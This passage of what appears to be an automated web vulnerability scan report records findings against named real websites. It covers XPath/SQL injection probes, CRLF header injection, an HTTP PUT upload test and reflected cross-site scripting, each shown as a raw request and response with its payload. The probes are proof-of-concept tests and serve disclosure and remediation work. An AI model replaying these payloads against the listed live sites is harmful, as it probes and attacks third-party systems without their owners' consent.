Set-Cookie: ning_session="nVdNOstw1Wwd3pQ9MfERZ5XA7iW5omP426d+IYw4032/qSqXv9ggV+DXyj999oWzF1tcrKfyFAU=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:26:00 GMT
XN-ResponseFrom: 10.16.47.166,(10.16.106.52,301,33)
Date: Sat, 02 Apr 2011 13:26:00 GMT
Set-Cookie: P=a%3A2%3A%7Bs%3A6%3A%22locale%22%3BN%3Bs%3A2%3A%22ab%22%3Bi%3A1691950182%3B%7D; expires=Tue, 30-Mar-2021 13:26:00 GMT; path=/
Location: http://www.ning.com/
Content-Type: text/html; charset=utf-8
Content-Length: 19093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>xp_subscribe('LogPageView', function(label_1, label_2, client_page_load_time, server_page_load_time) { xg_track_dynamic('PageView',{date:'xdate',host:'xhost',path:'xpath',user_agent:'xua',ip:'xip',cookie:'s',subdomain:'spretzel',screen_name:'s',section:'s',is_owner:'b0',is_admin:'b0',is_member:'b0',join_date:'80',referrer:'s',reload_count:'20',client_page_load_time_de
...[SNIP]...

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache
Set-Cookie: flsid=899145ae9fb41c146ae6e41bb855b653; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 31 Mar 2011 05:45:51 GMT
Set-Cookie: fl-uid=03f6276b0fa2982d890f0193e189b615%2C1%2C1301748253; expires=Sun, 01-Apr-2012 12:44:13 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 78472
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>TheFind - Shopped &amp; Found</title>


<script type="text/javascri
...[SNIP]...
<script type="text/javascript" src="//cdn.thefind.com/scripts/main/utils-initjquery-elation-browser-tracking-panel-ajaxlib-events-ui-msie~xpath/tplmgr-tplmgr/ui-infobox/user-user/marketing-bigpicture/jquery-suggest/search-suggest-input-search">
...[SNIP]...

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wwe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.17
Last-Modified: Fri, 01 Apr 2011 16:47:30 +0000
Vary: Cookie
ETag: "1301676450"
X-App: p5tyr3
Content-Type: text/html; charset=utf-8
X-Varnish: 1587144406 1587143361
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
X-Cacheable: NO: beresp.status 1
X-Cacheable-status: 404
Content-Length: 53517
X-Varnish: 979578143 959694108
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1002095
Vary: Accept-Encoding
Cache-Control: public, must-revalidate, max-age=11294
Date: Sat, 02 Apr 2011 13:39:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

jQuery.extend(Drupal.settings, {"basePath":"\/","automodal":{".automodal":{"autoFit":false,"draggable":true,"width":2000,"height":2000,"automodalClose":true,"automodalReload":false}},"jcarousel":{"ajaxPath":"\/jcarousel\/ajax\/views"},"twitter_enabled":true,"getQ":"node\/16810560","views":{"ajax_path":"\/views\/ajax","ajaxViews":[{"view_name":"promo_pod","view_display_id":"block_1","view_args":"","view_
...[SNIP]...

4. HTTP PUT enabled

Summary

Severity:   High
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

HTTP PUT is enabled on the web server. The file /9a847644e2391b55.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr
Content-Length: 16

facafbdd945895ba

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 02 Apr 2011 12:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://activresa-secure2.icor.fr/9a847644e2391b55.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 12:48:23 GMT
Accept-Ranges: bytes
ETag: W/"5222c64034f1cb1:3765"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:23 GMT
Connection: close

facafbdd945895ba

5. HTTP header injection
There are 15 instances of this issue:


5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7805c%0d%0aa049615f928 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7805c%0d%0aa049615f928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:14 GMT
Location: http://www.ew.com/ew/7805c
a049615f928

Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/78
...[SNIP]...

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2afbc%0d%0a10ac4b7e696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico2afbc%0d%0a10ac4b7e696 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familyeducation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:57:17 GMT
Location: /defaultpage.htm?/favicon.ico2afbc
10ac4b7e696



5.3. http://www.health.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5cc2%0d%0a808e9ba22de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5cc2%0d%0a808e9ba22de HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:35:15 GMT
Location: http://www.health.com/health/a5cc2
808e9ba22de

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.health.com/h
...[SNIP]...

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a31ef%0d%0ac36e0392523 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a31ef%0d%0ac36e0392523 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homestead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:35:09 GMT
Location: /a31ef
c36e0392523
/


5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b65da%0d%0aa9cfd0405fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b65da%0d%0aa9cfd0405fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:58 GMT
Location: http://www.instyle.com/instyle/b65da
a9cfd0405fc

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.instyle.com/
...[SNIP]...

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livingsocial.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a8e30%0d%0ab8e0c5a066b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a8e30%0d%0ab8e0c5a066b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingsocial.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 02 Apr 2011 13:38:58 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://livingsocial.com/a8e30
b8e0c5a066b


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fade4%0d%0a04e193106f1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fade4%0d%0a04e193106f1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 12:43:26 GMT
Location: http://www.people.com/people/fade4
04e193106f1

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 894db%0d%0ab895b7fee0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /894db%0d%0ab895b7fee0e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplestylewatch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:56:32 GMT
Location: http://www.people.com/894db
b895b7fee0e

Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/8
...[SNIP]...

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0d3%0d%0a3d52478bda4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0d3%0d%0a3d52478bda4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /7f0d3
3d52478bda4
/
Date: Sat, 02 Apr 2011 13:46:30 GMT
Content-Length: 77

The URL has moved to <a href="/7f0d3
3d52478bda4/">/7f0d3
3d52478bda4/</a>

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e81a0%0d%0a052c3a9c4af was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?e81a0%0d%0a052c3a9c4af=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3f544%0d%0a18f859d78f2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?3f544%0d%0a18f859d78f2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tbo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fefb7%0d%0ad3916ee3b78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fefb7%0d%0ad3916ee3b78 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:59:19 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.tbo.com/fefb7
d3916ee3b78

Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff592%0d%0afdec1d1094 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff592%0d%0afdec1d1094 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisoldhouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:13:11 GMT
Location: http://www.thisoldhouse.com/toh/ff592
fdec1d1094

Vary: Accept-Encoding
Content-Length: 327
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.thisoldhouse
...[SNIP]...

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload aa6b8%0d%0a651e1e31954 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /aa6b8%0d%0a651e1e31954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:39:56 GMT
Server: Apache/2.2.16 (Debian)
Location: http://wn.com/aa6b8
651e1e31954

Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://wn.com/aa6b8
65
...[SNIP]...

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.youravon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3419d%0d%0a6094b152882 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3419d%0d%0a6094b152882 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youravon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Location: http://3419d
6094b152882
.avonrepresentative.com/
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://3419d
6094b152882.avonrepresentative.co
...[SNIP]...

6. Cross-site scripting (reflected)

There are 122 instances of this issue:

6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0fb"-alert(1)-"131e368384f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:00:26 GMT
Expires: Sat, 02 Apr 2011 13:00:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384fhttp://www.webex.com/lpintl/us/banner/next-meeting-together.html?TrackID=1024434");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61763"-alert(1)-"fd5b291024e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:47 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
HN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscU
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

